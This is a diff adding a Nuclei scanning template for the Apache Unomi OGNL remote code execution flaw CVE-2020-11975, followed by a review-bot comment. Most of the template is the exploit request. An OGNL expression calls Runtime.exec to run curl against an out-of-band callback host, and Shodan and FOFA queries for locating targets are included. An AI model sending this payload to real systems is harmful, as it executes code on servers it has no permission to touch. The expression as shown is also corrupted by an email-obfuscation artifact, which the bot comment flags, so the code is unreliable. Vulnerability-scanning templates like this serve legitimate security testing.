83 changes: 83 additions & 0 deletions http/cves/2020/CVE-2020-11975.yaml
@@ -0,0 +1,83 @@
id: CVE-2020-11975

info:
name: Apache Unomi - Remote Code Execution
author: Sourabh-Sahu
severity: critical
description: |
Apache Unomi allows conditions to use OGNL scripting which offers the possibility to call static Java classes from the JDK that could execute code with the permission level of the running Java process, enabling attackers to execute arbitrary code.
impact: |
Successful exploitation allows an attacker to execute arbitrary code on the server with the privileges of the Java process, potentially leading to complete system compromise.
remediation: |
Update Apache Unomi to version 1.5.2 or later. Disable OGNL scripting in conditions if not required.
reference:
- https://xz.aliyun.com/news/8157
- https://github.com/1135/unomi_exploit
- https://unomi.apache.org/security/cve-2020-11975.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-11975
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-11975
cwe-id: CWE-94
epss-score: 0.97373
epss-percentile: 0.99982
cpe: cpe:2.3:a:apache:unomi:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: apache
product: unomi
shodan-query: http.title:"Apache Unomi"
fofa-query: title="Apache Unomi"
tags: cve,cve2020,apache,unomi,rce,ognl,oast

http:
- method: POST
path:
- "{{BaseURL}}/context.json"
headers:
Content-Type: application/json
body: |
{
"personalizations":[
{
"id":"gender-test_anystr",
"strategy":"matching-first",
"strategyOptions":{
"fallback":"var2"
},
"contents":[
{
"filters":[
{
"condition":{
"parameterValues":{
"propertyName":"(#[email protected]@getRuntime()).(#r.exec(\"curl {{interactsh-url}}\"))",
"comparisonOperator":"equals_anystr",
"propertyValue":"male_anystr"
},
"type":"profilePropertyCondition"
}
}
]
}
]
}
],
"sessionId":"test-demo-session-id"
}

matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"

- type: dsl
dsl:
- 'contains_all(body, "profileId\":", "sessionId\":")'
- 'contains(content_type, "application/json")'
- 'status_code == 200 || status_code == 500'
condition: and
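Review bot: the `propertyName` value on the `"propertyName":"(#[email protected]@getRuntime())..."` line looks corrupted by the rendering's email-address obfuscation (the `[email protected]` token sits in the middle of an OGNL expression), so the body as shown here is not the expression the template intends to send; compare against the file in the repository before treating this view as the merged payload. Separately, since `matchers-condition: and` makes the `interactsh_protocol` `dns` match mandatory, this template only reports the host as vulnerable when the target can resolve external DNS; a patched or egress-restricted host will return the same `profileId`/`sessionId` JSON and 200/500 status that the `dsl` matcher accepts, so the DSL block alone is not a vulnerability indicator and a comment saying so (or a `remediation` note that the check is OAST-dependent) would help template users interpret negative results.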